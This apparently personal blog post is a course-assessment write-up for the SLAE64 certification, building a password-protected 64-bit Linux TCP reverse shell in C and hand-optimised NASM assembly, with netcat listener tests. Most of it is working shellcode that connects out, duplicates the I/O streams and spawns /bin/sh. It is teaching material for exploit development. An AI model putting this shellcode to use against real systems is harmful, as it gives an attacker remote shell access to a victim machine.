Codehead's Corner
Random ramblings on hacking, coding, fighting with infrastructure and general tech
Security Tube SLAE64 Course - Assessment 2 - TCP Reverse Shell
Posted: 27 Oct 2017 at 13:46 by Codehead

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This write up is for the second assignment: Create a shellcode string that will start a TCP Reverse Shell.

A reverse shell connects to a remote host on a given network address and port. Any commands issued by the remote host are relayed to a local shell on the target in the same way as the bind shell.


Having the target reach out to the remote machine may seem like an odd way of making the connection, especially as the remote must be ready and listening for the connection to be successful. However, this type of connection is preferable if the target is behind a firewall or a network address translation (NAT) layer which would make an inbound connection to a bind shell difficult.

As with the bind shell a passphrase must be implemented to add a layer of security to the program.

High Level Proof of Concept

Again, Vivek provided a rough outline of the code in C during the course and this was taken as a base for this assignment.

The full listing of my version of the code is hosted on GitHub: Reverse_Shell.c.

As the code for the bind shell was covered in detail in the first assignment, I won’t go into another line by line breakdown. However, it is worth looking at the parts which have changed.

Socket parameters

We’re connecting out to a remote machine, so the sockaddr_in structure has a specific address entry this time.

server.sin_family = AF_INET;    // 2
server.sin_port = htons(4444);  // 0x5c11
server.sin_addr.s_addr = inet_addr("");  // 0x7f000001
bzero(&server.sin_zero, 8);

We’re using the loopback address to keep things simple for this example. To insert an arbitrary address we can use Python to look up the hex conversion. The Python socket module does not have a inet_addr() function to convert an address string, but the inet_aton() function works in a similar way:

MBP:slae64$ python
Python 2.7.12 (default, Jun 29 2016, 14:05:02)
Type "help", "copyright", "credits" or "license" for more information.
>>> import socket
>>> socket.inet_aton("")

Remember that the converted value is still a string and will need to be reversed when building the sockaddr_in structure in memory.

Connecting the socket

There is no bind step required for a client socket, we simply reach out to the remote host:

// Connect to remote host       
if((connect(sock, (struct sockaddr *)&server, sockaddr_len)) == -1)
    perror("connect: ");

There is no timeout period or retry count on a client socket, a ‘Connection Refused’ error will occur if the target socket is not up, running and able to accept the connection.

Validating the user

The validation loop was removed for this program. If an invalid password is returned from the prompt, the connection is dropped and the program exits. Depending on how the remote server is running, the remote socket will probably also be closed in response to the disconnect. There would be little point in immediately retrying the connection.

// Check password
send(sock, (char*)"Anyone there?\n", 14, 0);
read(sock, &in, 10);

if(strncmp("BigSecret", in, 9))
    send(sock, (char*)"Nope\n", 5, 0);

Assuming the password is entered correctly, the rest of the code is much the same as the bind shell. I/O streams are duplicated and a new shell instance is spawned.

Testing the code

We can set up a listening socket using netcat:

codehead@ubuntu:assignment_2$ nc -l 4444

Running the reverse shell code from another terminal, we should see the prompt appear in the netcat process:

codehead@ubuntu:assignment_2$ nc -l 4444
Anyone there?
codehead@ubuntu:assignment_2$ nc -l 4444
Anyone there?

Remember to start the netcat listener before running the reverse shell.

Converting the code to Assembler

We can re-use a good deal of the Bind_Shell.nasm code to create the reverse shell. However, this time I am making an extra effort to reduce the code size as much as possible.

Storage Requirements

We will use the stack to store variables again. This time we only need to store one fixed value; the socket ID.


The buffers remain the same, even though we only have one sockadr_in struct this time.

Setting up

We’ll use the jump, call, pop method to locate the string data within our code:

    mov rbp, rsp
    jmp short _strdata  ; Find address of string list
    pop r15             ; RIP address is the start of string data
    jmp short _main

    call _getref        ; Push RIP onto stack
    prompt: db "?", 0xa
    pass:   db "BigSecret"
    good:   db "OK", 0xa

The strings are pretty minimal to reduce the size of the shellcode. In the last assignment, I sacrificed the strings to save space. In the reverse shell, some kind of indication is needed to show an operator that the target has made the connection to the host, so I’m leaving some of the bells and whistles in.

We include the _prompt and _exit utility methods again. This time they are optimised to reduce size.

_prompt:                ; send string to a socket, RSI and RDX populated before call    
    pop rdi
    push rdi            ; socket id
    xor rax, rax    
    mov r10, rax        ; Zero unused params
    mov r8, rax
    mov r9, rax 
    add al, 44          ; sys_sendto

_exit:                  ; exit nicely
    xor rax, rax
    push rax
    pop rbx
    add al, 0x3c
    inc ebx
    mov rsp, rbp

Intermission: Optimising instruction counts

While trying to reduce the size of the shellcode I discovered quite a few odd things about x64 assembler.

Adding (or subtracting) small values using the RAX or AX registers is a 4 byte instruction. Using AL cuts that in half.

48 83 c0 10        add rax,0x10     
83 c0 10           add eax,0x10 
66 83 c0 10        add ax, 0x10 
80 c4 10           add ah, 0x10     
04 10              add al, 0x10     

Unfortunately, the same cannot be said for the RBX, RCX and RDX registers. Although, we can still save a byte by favouring the extended register.

48 83 eb 10        sub rbx,0x10                 
83 eb 10           sub ebx,0x10                 
66 83 eb 10        sub bx, 0x10                  
80 ef 10           sub bh, 0x10                  
80 eb 10           sub bl, 0x10                  

Index registers don’t have high byte access, but the extended register is still clearly the best option.

48 83 c6 10        add rsi,0x10             
83 c6 10           add esi,0x10             
66 83 c6 10        add si, 0x10       
40 80 c6 10        add sil,0x10       

Increments and decrement operations are also best used on the 32bit classes to help avoid carry issues. This applies for most registers.

48 ff c0           inc rax                
ff c0              inc eax                
66 ff c0           inc ax                 
fe c0              inc al                 
fe c4              inc ah 

ff cb              dec ebx
ff c9              dec ecx
ff ce              dec esi
ff cf              dec edi

Accessing the extra x64 registers is quite verbose and nowhere near as efficient:

49 83 c1 10        add r9,0x10 
41 83 c1 10        add r9d,0x10
66 41 83 c1 10     add r9w,0x10
41 80 c1 10        add r9b,0x10
41 fe c1           inc r9b      

When moving data around, using the stack seems much more preferable to simple MOV calls.

48 89 c3           mov rbx,rax                
50                 push rax                    
5b                 pop  rbx                      

A MOV operation is 3 bytes, using PUSH/POP is just 2.

In fact it is often easier to PUSH an absolute value onto the stack, then POP into the required register than to do an XOR and ADD.

48 31 c0           xor    rax,rax
04 10              add    al,0x10

6a 10              push   0x10
58                 pop    rax

Of course, the x64 registers throw a spanner in the works by requiring two bytes for PUSH/POP:

41 51              push r9
41 52              push r10
41 5e              pop  r14
41 5f              pop  r15   

These optimisations are small, but when applied over the whole program they can make a big difference. There is no ‘one size fits all rule’ for reducing the code size, but by selecting the best approach based on the required outcome or re-ordering the operations to make best use of resources, good savings can be made.

Creating the socket

Getting back to the code, we’ll create and configure socket in the same way as last time. However, this time we need to populate the address field, remembering to build the in-memory string in reverse.

The layout we’re going for looks like this:


Some careful optimisation with INC and PUSH/POP instructions really helps reduce the byte count here. However, readability is sacrificed.

; Build a server sockaddr_in struct on the stack
    xor rax, rax
    push rax            ; sin_zero
    inc eax             ; start the address
    shl eax, 24         ; pad with three zeros
    add al, 0x7f        ; overwrite the last zero with 0x7f / 127
    shl rax, 16
    add ax, 0x5c11      ; htons(4444)
    shl rax, 16
    add al, 2           ; sin_family
    push rax
; Create Socket 
    xor rdi, rdi
    push rdi
    push rdi
    pop rax
    pop rdx
    inc edi
    push rdi
    pop rsi             ; SOCK_STREAM (1)
    inc edi             ; AF_INET (2)
    add al, 41          ; syscall 41
    cmp rax, -1
    jle short _exit
    push rax            ; store socket id on stack

Connecting to the remote host

The connect syscall matches the C function:

ID / RAX Name Arg1 / RDI Arg2 / RSI Arg3 / RDX
42 sys_connect int fd struct sockaddr *uservaddr int addrlen

Because we know that the socket ID is the top value on the stack, we can use the POP/PUSH trick to load a register in two bytes rather then the 4 required for a rdi,[rbp-24] move with stack offset calculation. We also use the PUSH/POP absolute assign method to save a few extra bytes here when defining the constants.

; Connect to remote host
    pop rdi
    push rdi            ; socket id
    lea rsi, [rbp-16]   ; sockaddr struct
    push 16
    pop rdx             ; struct size
    push 42
    pop rax             ; sys_connect
    cmp eax, -1
    jle short _exit

Assuming the return in RAX (I’m actually using CMP EAX to save a byte) is greater than -1, we have a connection to the remote host and can move on to the authentication.


As previously stated, a visual prompt is required to let an operator on the listening host know that an incoming connection has been made. If the listening socket was under the control of some code rather than netcat, we could trigger actions on connect, but for the purpose of this exercise we need to send a ‘Hello’ message.

The shortest thing I could come up with that still conveyed a request for input was a question mark. So, the prompt for a password is just that: a question mark followed by a newline. We know from our earlier jump, call, pop code that the strings start at the address pointed to by r15. We also provide the length of the string. The _prompt function does the rest.

; Send message
    mov rsi, r15        ; string address
    push 2
    pop rdx             ; string length
    call _prompt 

We don’t need the sockaddr_in data any more, so we are free to overwrite buffer 1 with the input received from the remote host. The socket ID is still top of the stack, so we can use the POP/PUSH trick again.

; Listen for response
    pop rdi
    push rdi            ; socket id
    lea rsi, [rbp-16]   ; buffer address
    xor rax, rax        ; Zero out registers
    push rax
    pop r10
    mov r8, rax
    mov r9, rax 
    push 9
    pop rdx             ; buffer length
    add al, 45          ; recvfrom

We covered string checks with CMPSB in the last assessment, so there is no need to dissect this. However, a small optimisation worth pointing out is the _exit handler. In the event of a mismatch, we need to stop the program. The _exit function back at the start of the code is beyond the 127 byte reach of a short jump, meaning we end up with a bloated 6 byte relative jump. To get around this, an extra location named _end was added before the final _exit call at the end of the code. This is within 127 bytes and reduces a 6 byte relative jump to a 2 byte short jump.

; Check for correct pass phrase
    lea rsi, [rbp-16]   ; input buffer address
    lea rdi, [r15+2]    ; password string address
    push 9
    pop rcx             ; length
    cmpsb               ; compare bytes
    jne short _end      ; exit if no match
    loop _cmploop       ; next char 

Using the short keyword forces the assembler to use the 2 byte jump instruction and will print errors when these jumps are out of range. It can be annoying to put the extra work in to manage these jumps, but it is well worth it to save 4 bytes.

Assuming the password is validated, all that is left to do is set up the shell as before. These methods have been optimised for size, but the functionality is identical.

; good passphrase (fallthrough)
    lea rsi, [r15+11]   ; OK string
    push 3
    pop rdx             ; welcome length
    call _prompt

; Duplicate I/O descriptors
    xor rax, rax    
    pop rdi
    push rdi            ; socket id
    push rax
    pop rsi             ; 0 = STDIN
    add al, 33          ; dup2  
    push rax            ; keep syscall id

    pop rax             ; dup2
    push rax
    inc esi             ; 1 = STDOUT

    pop rax             ; dup2
    inc esi             ; 2 = STDERR
; spawn a shell
    xor rax, rax
    push rax
    pop rdx        
    mov rbx, 0x68732f6e69622f78 ; build X/bin/sh
    shr rbx, 8          ; shift the ¨X¨ and append a NULL
    mov [rbp-16], rbx   ; copy ¨/bin/sh¨ string to buffer
    lea rdi, [rbp-16]   ; get the /bin/sh string
    push rax            ; build args array, by pushing NULL
    push rdi            ; then pushing string address
    mov rsi, rsp        ; args array address
    add al, 59          ; execve
    call _exit  

Note the _end label between the execve syscall and the final call to _exit.

Shellcode conversion and testing

As with the bind shell, this code contains inline string data which confuses the Commandline Fu shellcode extractor. So the raw hex was extracted with my Hexdump script.

The resulting shellcode comes in at 256 bytes which is pretty good. Even with the strings and error checking left in, it is smaller than the cut down version of the reverse shell. No pesky null bytes either.


Running the shellcode under Vivek’s Shellcode Wrapper, we see that the required functionality is present and working correctly:

codehead@ubuntu:assignment_2$ nc -l 4444
codehead@ubuntu:assignment_2$ nc -l 4444
codehead@ubuntu:assignment_2$ nc -l 4444

That completes this assessment. While the code was not ground breaking, working on the optimisation of shellcode size was a useful and interesting exercise.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE64-1471

Categories: SLAE64 Assembler Shellcode

Site powered by Hugo.
Polymer theme by pdevty, tweaked by Codehead